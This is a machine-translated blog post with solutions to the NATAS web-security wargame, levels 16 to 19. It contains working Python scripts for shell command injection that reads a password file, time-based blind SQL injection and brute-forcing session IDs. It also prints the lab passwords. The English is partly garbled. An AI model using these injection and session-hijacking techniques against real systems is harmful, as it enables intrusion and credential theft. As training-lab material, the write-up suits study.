当前位置:网站首页>Wargames NATAS (16-19) problem solving essays
Wargames NATAS (16-19) problem solving essays
2022-07-24 08:26:00 【renu08】
Natas Level 15 → Level 16
Tips :shell Script $() You can execute command nesting in quotation marks , Can be in grep In the construction of a grep, for example :
grep -i " $(grep ^pwd password.txt)"worng doctionary.txt
The program will execute sub shell Go to query password.txt In file pwd character string , If it doesn't match , Will output null , The outer layer is equivalent to execution grep -i worng dictionary.txt, To dictionary.txt Query in worng character string , The query will output wrong character string , conversely , If the inner layer finds , The outer layer will output null . So we can use this point for password blasting . I still use python The implementation code is as follows :
import urllib.request
import urllib.parse
import re
url = 'http://natas16.natas.labs.overthewire.org'
headers = {
'Host': 'natas16.natas.labs.overthewire.org',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Authorization': 'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA==',
'Connection': 'keep-alive',
'Referer': 'http://natas16.natas.labs.overthewire.org/?needle=accounts&submit=Search',
'Cookie': '__utma=176859643.1665848136.1639378791.1640070651.1640436097.15; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
'Upgrade-Insecure-Requests': '1'
}
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
n1 = '$(grep ^'
n2 = ' /etc/natas_webpass/natas17)accounts'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
pattern = re.compile(r'\naccounts')
pwd = ''
values = {
'needle':'',
'submit':'Search'
}
for i in range(length):
for ch in dic:
needle = n1 + pwd + ch + n2
print(needle)
values['needle'] = needle
data = urllib.parse.urlencode(values)
r = url+'?'+ data
req=urllib.request.Request(url=r,headers=headers,method='GET')
response = urllib.request.urlopen(req)
html = response.read().decode('ascii')
if pattern.search(html):
continue
else:
pwd += ch
break
print(pwd)
username:natas17
password:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
Pass through !
Natas Level 16 → Level 17
Tips : Open the source code and compare it with the previous discovery , The output is commented out , in the light of mysql Database Injection , Generally, there are three directions :
- Echo based injection , The server will return some information
- Time based blind annotation , The server does not return any information , It can be cleverly constructed SQL sentence , Judge some information by the response time of the server
- Injection based on error reporting ( A little )
The previous question is based on echo injection , This question is a blind note based on time
I use python Write a script , The code is as follows :
import requests
url = 'http://natas17.natas.labs.overthewire.org/index.php'
headers = {
'Host': 'natas17.natas.labs.overthewire.org',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://natas17.natas.labs.overthewire.org',
'Authorization': 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw==',
'Connection': 'keep-alive',
'Referer': 'http://natas17.natas.labs.overthewire.org/',
'Cookie': '__utma=176859643.1665848136.1639378791.1640436097.1640518734.16; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
'Upgrade-Insecure-Requests': '1'
}
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
n1 = 'natas18" AND BINARY password LIKE "'
n2 = '%" AND SLEEP(10)#'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
pwd = ''
for i in range(length):
for ch in dic:
name = n1 + pwd + ch + n2
print(name)
data = {
'username':name}
res = requests.post(url,data=data,headers=headers)
time = res.elapsed.total_seconds()
print(time)
if time > 10:
pwd += ch
break
print(pwd)
username:natas18
password:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
Be careful : Because of the Internet , It is suggested that the delay time should be longer. I set it here 10 second SLEEP(10), Otherwise it will be wrong
Pass through !
Natas Level 17 → Level 18
Tips : After reading the source code, I found that the password can only be obtained by logging in as an administrator , The information of identity authentication is stored in $_SESSION variable , So you can go through session Session hijacking to log in as an administrator ,session Session hijacking requires obtaining session_id, Get session_id Then you can log in as an administrator . So what we need to do now is to get session_id, adopt bp Bag grabbing discovery cookies There is a field in PHPSESSIONID This is what the server uses to determine the identity of users , Then we just need to get the corresponding PHPSESSIONID, Then you can log in as an administrator .
Find out PHPSESSIONID The value of is just a pure number , Found in the source code $maxid=640, It means session_id The biggest is 640. Then we'll blast directly , use python Write the following code :
import requests
import re
url = 'http://natas18.natas.labs.overthewire.org/'
headers = {
'Host': 'natas18.natas.labs.overthewire.org',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Authorization': 'Basic bmF0YXMxODp4dktJcURqeTRPUHY3d0NSZ0RsbWowcEZzQ3NEamhkUA==',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'
}
pattern = re.compile(r'You are logged in as a regular user')
for i in range(640):
val = str(i)
cookies = {
'PHPSESSID':val}
res = requests.get(url,headers=headers,cookies=cookies)
if pattern.search(res.content.decode('ascii')):
print(val)
else:
print('session_id=' + val)
print(res.content.decode('ascii'))
break
Execute the script ,OK Found the administrator's session_id=119 And the next pass
username:natas19
password:4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
Pass through !
Natas Level 18 → Level 19
Tips : The source code of this pass is the same as that of Shangguan , But this is off PHPSESSIONID Not pure numbers , Try a few more times to find the rule PHPSESSIONID front 7 Bits are numbers , Find rules and find them 3xxxxxx Of , Then from 3000000 Start blasting , The last few are fixed ’d61646d696e’, Then it's still the same as the above direct blasting , It's a little long , Have a cup of coffee , The code is as follows :
import requests
import re
url = 'http://natas19.natas.labs.overthewire.org/index.php'
headers = {
'Host': 'natas19.natas.labs.overthewire.org',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Authorization': 'Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw==',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'
}
pattern = re.compile(r'You are an admin')
s_val = 3000000 #PHPSESSIONID front 7 Digit number ,admin Before 7 Is it 3238312
while(1):
session_id = str(s_val) + 'd61646d696e'
print('PHPSESSID: ' + session_id)
cookies = {
'PHPSESSID':session_id}
res = requests.get(url,headers=headers,cookies=cookies)
if pattern.search(res.content.decode('ascii')):
print('session_id=' + session_id)
print(res.content.decode('ascii'))
break
s_val += 1
After running the script, I found ,session_id=3238312d61646d696e, It's the administrator's session_id
username:natas20
password:eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
Pass through !
边栏推荐
- Wechat payment V3 version of openresty implementation and pit avoidance Guide (service side)
- A knight's journey
- nacos报错: ERROR Nacos failed to start, please see D:\nacos\logs\nacos.log for more details.
- My six months at Microsoft
- Why does the metauniverse need NFT?
- [internationalization] decimal point and comma of application development
- Digital collections are both outlets and risks!
- Chinese brands in the historical process
- P1739 expression bracket matching problem solution
- Play to earn: a new and more promising game paradigm in the future
猜你喜欢
The beta version of move protocol is stable, and it is temporarily decided to expand the scale of the prize pool
Wechat applet file types and functions
Saining Techtalk attack and defense drill: attack combination fist "stable, accurate and ruthless" penetration
T-SQL query statement
Avoid pitfalls and stay away from PUA in the workplace. You need to know the common routines and scripts of PUA!
Figure storage geabase
MySQL date formatting
Wechat applet subscription message development process
Assembly | screen display numbers
![[Google play access] payment server token acquisition](/img/c6/d095ea2b88a11bf6b4bdd80499932c.png)
[Google play access] payment server token acquisition
随机推荐
Is yuancosmos hype? Or the future
[wechat applet development] (II) wechat native bottom tabbar configuration
Draw a circular radar chart with canvas
T-SQL query statement
[wechat applet development (III)] realize the stacking and sliding of cards
[shutter] the shutter doctor reports an error
The code is tired. Stop and enjoy the top color matching~
M-dao creates a one-stop Dao platform, allowing hundreds of millions of players to join Dao space
[Google play access] payment server token acquisition
Kotlin coroutine (I): foundation and deepening
[wechat applet development] (III) homepage banner component uses swiper
Vidar-Team战队专访:AS WE DO, AS YOU KNOW.
Poj3278 catch the cow
图新地球:Revit建模的rvt格式BIM模型如何带着纹理精准匹配地图
Learn - use do... While loop according to the formula e=1+1/1+ 1/2!+ 1/3!+…+ 1/n! Calculate the value of E (accuracy is 1e-6)
我在微软的这六个月
Go: Gin basicauth Middleware
How to write your FAQ page?
Upload and insert the execle table into the database based on ThinkPHP
From starfish OS' continued deflationary consumption of SFO, the value of SFO in the long run